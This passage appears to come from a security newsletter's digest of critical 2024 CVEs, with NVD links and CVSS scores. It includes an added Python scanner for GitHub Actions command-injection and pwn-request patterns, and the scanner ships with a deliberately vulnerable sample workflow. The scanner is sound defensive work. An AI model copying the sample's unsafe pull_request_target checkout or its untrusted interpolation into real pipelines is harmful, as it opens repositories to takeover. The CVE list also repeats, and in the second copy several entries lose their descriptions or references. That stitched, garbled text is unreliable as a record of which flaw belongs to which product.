NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: Code-Projects Crud Operation System
CVSS Score: 9.8
NVD:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8868
- https://github.com/ppp-src/a/issues/7
CVE-2024-46918 - MISP allows org admins to view sensitive login fields of other org admins in the same org before version 2.4.198.
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
- https://github.com/MISP/MISP/compare/v2.4.197...v2.4.198
CVE-2024-46942 - OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1 allows a controller with a follower role to configure flow entries in a clustering deployment.
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/MDSAL-869
CVE-2024-46943 - OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3 allows a rogue controller to impersonate an offline peer by joining a cluster without possessing complete configuration information.
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
- https://doi.org/10.48550/arXiv.2408.16940
- https://lf-opendaylight.atlassian.net/browse/AAA-285
CVE-2024-45694 & CVE-2024-45695 - Certain models of D-Link wireless routers are susceptible to Stack-based Buffer Overflow vulnerabilities, enabling unauthenticated remote attackers to execute arbitrary code on the device.
Product: Dlink Dir-X5460 and D-Link Dir-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
- https://www.twcert.org.tw/en/cp-139-8083-a299e-2.html
- https://www.twcert.org.tw/tw/cp-132-8082-f1687-1.html
CVE-2024-45697 - D-Link wireless routers have a hidden telnet service vulnerability that allows unauthorized remote attackers to execute OS commands using hard-coded credentials.
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
- https://www.twcert.org.tw/en/cp-139-8089-32df6-2.html
- https://www.twcert.org.tw/tw/cp-132-8088-590ed-1.html
CVE-2024-22399 - Apache Seata is vulnerable to deserialization of untrusted data when authentication is disabled on the Seata-Server and the Seata client SDK dependencies are not used, allowing for the construction of malicious requests using bytecode based on the Seata private protocol.
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
CVE-2024-46451 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
CVE-2024-46419 - TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWizardCfg function via the ssid5g parameter.
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
CVE-2024-46937 - MFASOFT Secure Authentication Server (SAS) versions 1.8.x through 1.9.x before 1.9.040924 allows remote attackers to access user tokens without authentication by brute-forcing the serial parameter.
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
CVE-2024-45496 - OpenShift is vulnerable to arbitrary command execution due to misuse of elevated privileges in the build process, allowing an attacker to escalate permissions on the worker node.
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment Variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: MISP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46918
NVD References:
- https://github.com/MISP/MISP/commit/3a5227d7b3d4518ac109af61979a00145a0de6fa
Product: OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46942
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/mdsal.html
Product: OpenDaylight Authentication, Authorization and Accounting (AAA)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46943
NVD References:
- https://docs.opendaylight.org/en/latest/release-notes/projects/aaa.html
Product: Dlink Dir-X5460 and D-Link Dir-X4860
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45694
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45695
NVD References:
- https://www.twcert.org.tw/en/cp-139-8081-3fb39-2.html
- https://www.twcert.org.tw/tw/cp-132-8080-7f494-1.html
Product: D-Link wireless routers
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45697
NVD References:
Product: Apache Seata
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-22399
NVD References: https://lists.apache.org/thread/91nzzlxyj4nmks85gbzwkkjtbmnmlkc4
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46451
NVD References: https://github.com/offshore0315/loT-vulnerable/blob/main/TOTOLINK/AC1200%20T8/setWiFiAclRules.md
Product: TOTOLINK T8
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46419
NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) affecting the `tests_results.yml` workflow, including environment variable injection from untrusted input.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
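As an added illustration (not code from the arduino-esp32 project or its advisory), the scanner below flags the two GitHub Actions patterns the references above describe: attacker-controlled event data interpolated directly into a `run:` script (which is how a crafted PR title or branch name ends up in `$GITHUB_ENV` or in the shell) and checkout of the pull-request head under a privileged `pull_request_target`/`workflow_run` trigger. The workflow it scans is constructed for this example and is not the project's `tests_results.yml`; the list of untrusted contexts is illustrative, not complete.

```python
import re

# Contexts an external contributor controls when a workflow runs on
# pull_request_target / workflow_run (drawn from the GitHub Security Lab
# "untrusted input" write-up linked above; illustrative, not complete).
UNTRUSTED_CONTEXTS = (
    r"github\.event\.pull_request\.title",
    r"github\.event\.pull_request\.body",
    r"github\.event\.pull_request\.head\.ref",
    r"github\.event\.pull_request\.head\.label",
    r"github\.event\.pull_request\.head\.repo\.default_branch",
    r"github\.event\.issue\.title",
    r"github\.event\.issue\.body",
    r"github\.event\.comment\.body",
    r"github\.event\.review\.body",
    r"github\.event\.workflow_run\.head_branch",
    r"github\.event\.workflow_run\.head_commit\.(message|author\.(name|email))",
    r"github\.head_ref",
)
UNTRUSTED_RE = re.compile("|".join(UNTRUSTED_CONTEXTS))
EXPR_RE = re.compile(r"\$\{\{\s*([^}]+?)\s*\}\}")        # ${{ expr }}
RUN_RE = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")         # start of a run: step
REF_RE = re.compile(r"^\s*ref:\s*(.*)$")                  # actions/checkout ref
PRIVILEGED_TRIGGER_RE = re.compile(r"\b(pull_request_target|workflow_run)\b")


def _untrusted_exprs(text):
    """Expressions in `text` that interpolate attacker-controlled contexts."""
    return [e for e in EXPR_RE.findall(text) if UNTRUSTED_RE.search(e)]


def audit_workflow(yaml_text):
    """Heuristic, line-based scan of a workflow file (no YAML library needed).
    Returns (line_no, kind, detail) tuples:
      'injection'   - untrusted expression interpolated into a run: script,
                      including writes to $GITHUB_ENV / $GITHUB_OUTPUT
      'pwn-request' - checkout of the PR head under a privileged trigger
    """
    findings = []
    privileged = bool(PRIVILEGED_TRIGGER_RE.search(yaml_text))
    in_run, key_col = False, 0
    for no, line in enumerate(yaml_text.splitlines(), 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if in_run and (not stripped or indent > key_col):
            # Continuation line of a block-scalar run: script
            for expr in _untrusted_exprs(line):
                findings.append((no, "injection", expr))
            continue
        in_run = False
        m = RUN_RE.match(line)
        if m:
            in_run = True
            key_col = len(m.group(1)) + len(m.group(2) or "")
            for expr in _untrusted_exprs(m.group(3)):
                findings.append((no, "injection", expr))
            continue
        m = REF_RE.match(line)
        if m and privileged and "github.event.pull_request.head" in m.group(1):
            findings.append((no, "pwn-request", m.group(1).strip()))
    return findings


# Constructed sample, not the arduino-esp32 workflow: a results-reporting job
# that runs with the base repository's token and mixes unsafe and safe steps.
SAMPLE_WORKFLOW = """\
name: tests-results
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  report:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Record PR title
        run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> "$GITHUB_ENV"
      - name: Summarise
        run: |
          echo "Branch: ${{ github.head_ref }}"
          ./scripts/summarise.sh
      - name: Safe variant
        env:
          PR_BODY: ${{ github.event.pull_request.body }}
        run: printf '%s\\n' "$PR_BODY"
"""

if __name__ == "__main__":
    for no, kind, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {no}: {kind}: {detail}")
```

Running it against the sample reports the checkout of the PR head (line 11), the title written into `$GITHUB_ENV` (line 13) and the branch name echoed from a block scalar (line 16), and stays silent on the last step, which shows the fix: pass untrusted values through `env:` and reference them as shell variables so the expression is never expanded into the script text.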
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References:
- https://ptzoptics.com/firmware-changelog/
- https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Webcast: SANS 2024 ICS/OT Survey: The State of ICS/OT Cybersecurity | Wednesday, October 9, 10:30 AM ET | SANS Certified Instructor, Jason Christopher, explores the growing trends in cyber threats, vulnerabilities, and risks across industrial environments, including actionable recommendations for how organizations can improve their security posture.
How would you fix 80,000 vulnerabilities? With Sevco, an S&P 500 company realized only a small number of devices needed patches to resolve those vulns.
Webcast: General Quarters! The Impact of Cybersecurity on the Maritime Industry | Thursday, October 17, 11:30 ET | In this webcast, SANS experts will explore the critical role of cybersecurity in safeguarding maritime operations. Save your seat today!